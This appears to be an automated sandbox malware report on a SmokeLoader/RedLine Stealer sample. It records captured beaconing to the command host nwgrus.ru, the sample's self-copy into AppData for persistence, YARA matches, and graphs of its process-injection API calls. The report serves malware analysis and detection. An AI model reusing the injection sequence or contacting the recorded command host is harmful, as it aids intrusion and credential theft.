                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://yvujkdpmsqqrh.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 174
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:58.534627914 CEST174OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 1d b5 fa
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuR}7YZiD&U=,guKKOQFNTCl6(@u)\.:8\z
                                                                                      Oct 1, 2024 15:20:59.510467052 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:59 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:09:16:55
                                                                                      Start date:01/10/2024
                                                                                      Path:C:\Users\user\Desktop\k8JAXb3Lhs.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\k8JAXb3Lhs.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:369'664 bytes
                                                                                      MD5 hash:EEAD7A529F768CD0A74A639FF806357C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:09:17:01
                                                                                      Start date:01/10/2024
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff72b770000
                                                                                      File size:5'141'208 bytes
                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:4
                                                                                      Start time:09:17:20
                                                                                      Start date:01/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\sfjujsr
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\sfjujsr
                                                                                      Imagebase:0x400000
                                                                                      File size:369'664 bytes
                                                                                      MD5 hash:EEAD7A529F768CD0A74A639FF806357C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:09:20:01
                                                                                      Start date:01/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\sfjujsr
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\sfjujsr
                                                                                      Imagebase:0x400000
                                                                                      File size:369'664 bytes
                                                                                      MD5 hash:EEAD7A529F768CD0A74A639FF806357C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:8.6%
                                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                                        Signature Coverage:43.4%
                                                                                        Total number of Nodes:122
                                                                                        Total number of Limit Nodes:4
                                                                                        execution_graph 3259 402e40 3261 402e37 3259->3261 3262 402edf 3261->3262 3263 4018e6 3261->3263 3264 4018f5 3263->3264 3265 40192e Sleep 3264->3265 3266 401949 3265->3266 3268 40195a 3266->3268 3269 401514 3266->3269 3268->3262 3270 401524 3269->3270 3271 4015c4 NtDuplicateObject 3270->3271 3276 4016e0 3270->3276 3272 4015e1 NtCreateSection 3271->3272 3271->3276 3273 401661 NtCreateSection 3272->3273 3274 401607 NtMapViewOfSection 3272->3274 3275 40168d 3273->3275 3273->3276 3274->3273 3277 40162a NtMapViewOfSection 3274->3277 3275->3276 3278 401697 NtMapViewOfSection 3275->3278 3276->3268 3277->3273 3279 401648 3277->3279 3278->3276 3280 4016be NtMapViewOfSection 3278->3280 3279->3273 3280->3276 3376 401542 3377 40153b 3376->3377 3378 4015c4 NtDuplicateObject 3377->3378 3383 4016e0 3377->3383 3379 4015e1 NtCreateSection 3378->3379 3378->3383 3380 401661 NtCreateSection 3379->3380 3381 401607 NtMapViewOfSection 3379->3381 3382 40168d 3380->3382 3380->3383 3381->3380 3384 40162a NtMapViewOfSection 3381->3384 3382->3383 3385 401697 NtMapViewOfSection 3382->3385 3384->3380 3386 401648 3384->3386 3385->3383 3387 4016be NtMapViewOfSection 3385->3387 3386->3380 3387->3383 3296 25f003c 3297 25f0049 3296->3297 3309 25f0e0f SetErrorMode SetErrorMode 3297->3309 3302 25f0265 3303 25f02ce VirtualProtect 3302->3303 3305 25f030b 3303->3305 3304 25f0439 VirtualFree 3308 25f04be LoadLibraryA 3304->3308 3305->3304 3307 25f08c7 3308->3307 3310 25f0223 3309->3310 3311 25f0d90 3310->3311 3312 25f0dad 3311->3312 3313 25f0dbb GetPEB 3312->3313 3314 25f0238 VirtualAlloc 3312->3314 3313->3314 3314->3302 3400 286ef88 3401 286ef97 3400->3401 3402 286f737 3 API calls 3401->3402 3403 286efaf 3402->3403 3439 402dd0 3440 402ddc 3439->3440 3441 4018e6 8 API calls 3440->3441 3442 402edf 3440->3442 3441->3442 3281 286ef97 3282 286efa6 3281->3282 3285 286f737 3282->3285 3286 286f752 3285->3286 3287 286f75b CreateToolhelp32Snapshot 3286->3287 3288 286f777 Module32First 3286->3288 3287->3286 3287->3288 3289 286f786 3288->3289 3290 286efaf 3288->3290 3292 286f3f6 3289->3292 3293 286f421 3292->3293 3294 286f432 VirtualAlloc 3293->3294 3295 286f46a 3293->3295 3294->3295 3295->3295 3357 4018f1 3358 4018f6 3357->3358 3359 40192e Sleep 3358->3359 3360 401949 3359->3360 3361 401514 7 API calls 3360->3361 3362 40195a 3360->3362 3361->3362 3426 401915 3427 4018c6 3426->3427 3428 40191a 3426->3428 3429 40192e Sleep 3428->3429 3430 401949 3429->3430 3431 401514 7 API calls 3430->3431 3432 40195a 3430->3432 3431->3432 3315 402f97 3316 4030ee 3315->3316 3317 402fc1 3315->3317 3317->3316 3317->3317 3318 40307c RtlCreateUserThread NtTerminateProcess 3317->3318 3318->3316 3319 25f0005 3324 25f092b GetPEB 3319->3324 3321 25f0030 3326 25f003c 3321->3326 3325 25f0972 3324->3325 3325->3321 3327 25f0049 3326->3327 3328 25f0e0f 2 API calls 3327->3328 3329 25f0223 3328->3329 3330 25f0d90 GetPEB 3329->3330 3331 25f0238 VirtualAlloc 3330->3331 3332 25f0265 3331->3332 3333 25f02ce VirtualProtect 3332->3333 3335 25f030b 3333->3335 3334 25f0439 VirtualFree 3338 25f04be LoadLibraryA 3334->3338 3335->3334 3337 25f08c7 3338->3337 3416 402d7b 3418 402d38 3416->3418 3417 4018e6 8 API calls 3419 402dc7 3417->3419 3418->3416 3418->3417 3418->3419 3339 25f0001 3340 25f0005 3339->3340 3341 25f092b GetPEB 3340->3341 3342 25f0030 3341->3342 3343 25f003c 7 API calls 3342->3343 3344 25f0038 3343->3344 3363 4014fe 3364 401506 3363->3364 3365 401531 3363->3365 3366 4015c4 NtDuplicateObject 3365->3366 3367 4016e0 3365->3367 3366->3367 3368 4015e1 NtCreateSection 3366->3368 3369 401661 NtCreateSection 3368->3369 3370 401607 NtMapViewOfSection 3368->3370 3369->3367 3371 40168d 3369->3371 3370->3369 3372 40162a NtMapViewOfSection 3370->3372 3371->3367 3373 401697 NtMapViewOfSection 3371->3373 3372->3369 3374 401648 3372->3374 3373->3367 3375 4016be NtMapViewOfSection 3373->3375 3374->3369 3375->3367

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 114 4015c4-4015db NtDuplicateObject 104->114 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 114->105 117 4015e1-401605 NtCreateSection 114->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 121 40168d-401691 119->121 120->119 123 40162a-401646 NtMapViewOfSection 120->123 121->105 124 401697-4016b8 NtMapViewOfSection 121->124 123->119 126 401648-40165e 123->126 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->105 129 4016e0 call 4016e5 127->129
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                        • Opcode Fuzzy Hash: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 161 4015c4-4015db NtDuplicateObject 151->161 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 161->152 164 4015e1-401605 NtCreateSection 161->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 168 40168d-401691 166->168 167->166 170 40162a-401646 NtMapViewOfSection 167->170 168->152 171 401697-4016b8 NtMapViewOfSection 168->171 170->166 173 401648-40165e 170->173 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->152 176 4016e0 call 4016e5 174->176
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                        • String ID:
                                                                                        • API String ID: 1652636561-0
                                                                                        • Opcode ID: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                        • Opcode Fuzzy Hash: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 205 4015c4-4015db NtDuplicateObject 195->205 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 205->196 208 4015e1-401605 NtCreateSection 205->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 212 40168d-401691 210->212 211->210 214 40162a-401646 NtMapViewOfSection 211->214 212->196 215 401697-4016b8 NtMapViewOfSection 212->215 214->210 217 401648-40165e 214->217 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->196 220 4016e0 call 4016e5 218->220
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                        • Opcode Fuzzy Hash: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 244 4015c4-4015db NtDuplicateObject 234->244 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 244->235 247 4015e1-401605 NtCreateSection 244->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 251 40168d-401691 249->251 250->249 253 40162a-401646 NtMapViewOfSection 250->253 251->235 254 401697-4016b8 NtMapViewOfSection 251->254 253->249 256 401648-40165e 253->256 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->235 259 4016e0 call 4016e5 257->259
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                        • Opcode Fuzzy Hash: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 284 4015c4-4015db NtDuplicateObject 274->284 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 284->275 287 4015e1-401605 NtCreateSection 284->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 291 40168d-401691 289->291 290->289 293 40162a-401646 NtMapViewOfSection 290->293 291->275 294 401697-4016b8 NtMapViewOfSection 291->294 293->289 296 401648-40165e 293->296 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->275 299 4016e0 call 4016e5 297->299
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                        • Opcode Fuzzy Hash: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                        • String ID:
                                                                                        • API String ID: 1921587553-0
                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 319 286f737-286f750 320 286f752-286f754 319->320 321 286f756 320->321 322 286f75b-286f767 CreateToolhelp32Snapshot 320->322 321->322 323 286f777-286f784 Module32First 322->323 324 286f769-286f76f 322->324 325 286f786-286f787 call 286f3f6 323->325 326 286f78d-286f795 323->326 324->323 329 286f771-286f775 324->329 330 286f78c 325->330 329->320 329->323 330->326
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0286F75F
                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0286F77F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_285d000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3833638111-0
                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction ID: 91ff210559ac45af43517c22d32616b0c191c9ff8dd05f2d02ffa2d4f7b02a63
                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction Fuzzy Hash: 0DF0903E201711ABD7203BF9BC8CB7E76E8EF59624F140629E757D18C0DB74E8468A61

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 25f003c-25f0047 1 25f004c-25f0263 call 25f0a3f call 25f0e0f call 25f0d90 VirtualAlloc 0->1 2 25f0049 0->2 17 25f028b-25f0292 1->17 18 25f0265-25f0289 call 25f0a69 1->18 2->1 20 25f02a1-25f02b0 17->20 22 25f02ce-25f03c2 VirtualProtect call 25f0cce call 25f0ce7 18->22 20->22 23 25f02b2-25f02cc 20->23 29 25f03d1-25f03e0 22->29 23->20 30 25f0439-25f04b8 VirtualFree 29->30 31 25f03e2-25f0437 call 25f0ce7 29->31 33 25f04be-25f04cd 30->33 34 25f05f4-25f05fe 30->34 31->29 36 25f04d3-25f04dd 33->36 37 25f077f-25f0789 34->37 38 25f0604-25f060d 34->38 36->34 40 25f04e3-25f0505 36->40 41 25f078b-25f07a3 37->41 42 25f07a6-25f07b0 37->42 38->37 43 25f0613-25f0637 38->43 51 25f0517-25f0520 40->51 52 25f0507-25f0515 40->52 41->42 44 25f086e-25f08be LoadLibraryA 42->44 45 25f07b6-25f07cb 42->45 46 25f063e-25f0648 43->46 50 25f08c7-25f08f9 44->50 48 25f07d2-25f07d5 45->48 46->37 49 25f064e-25f065a 46->49 53 25f07d7-25f07e0 48->53 54 25f0824-25f0833 48->54 49->37 55 25f0660-25f066a 49->55 57 25f08fb-25f0901 50->57 58 25f0902-25f091d 50->58 59 25f0526-25f0547 51->59 52->59 60 25f07e4-25f0822 53->60 61 25f07e2 53->61 56 25f0839-25f083c 54->56 62 25f067a-25f0689 55->62 56->44 63 25f083e-25f0847 56->63 57->58 66 25f054d-25f0550 59->66 60->48 61->54 64 25f068f-25f06b2 62->64 65 25f0750-25f077a 62->65 67 25f084b-25f086c 63->67 68 25f0849 63->68 69 25f06ef-25f06fc 64->69 70 25f06b4-25f06ed 64->70 65->46 72 25f0556-25f056b 66->72 73 25f05e0-25f05ef 66->73 67->56 68->44 74 25f06fe-25f0748 69->74 75 25f074b 69->75 70->69 76 25f056f-25f057a 72->76 77 25f056d 72->77 73->36 74->75 75->62 78 25f057c-25f0599 76->78 79 25f059b-25f05bb 76->79 77->73 84 25f05bd-25f05db 78->84 79->84 84->66
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025F024D
                                                                                        Strings
                                                                                        Memory Dump Source
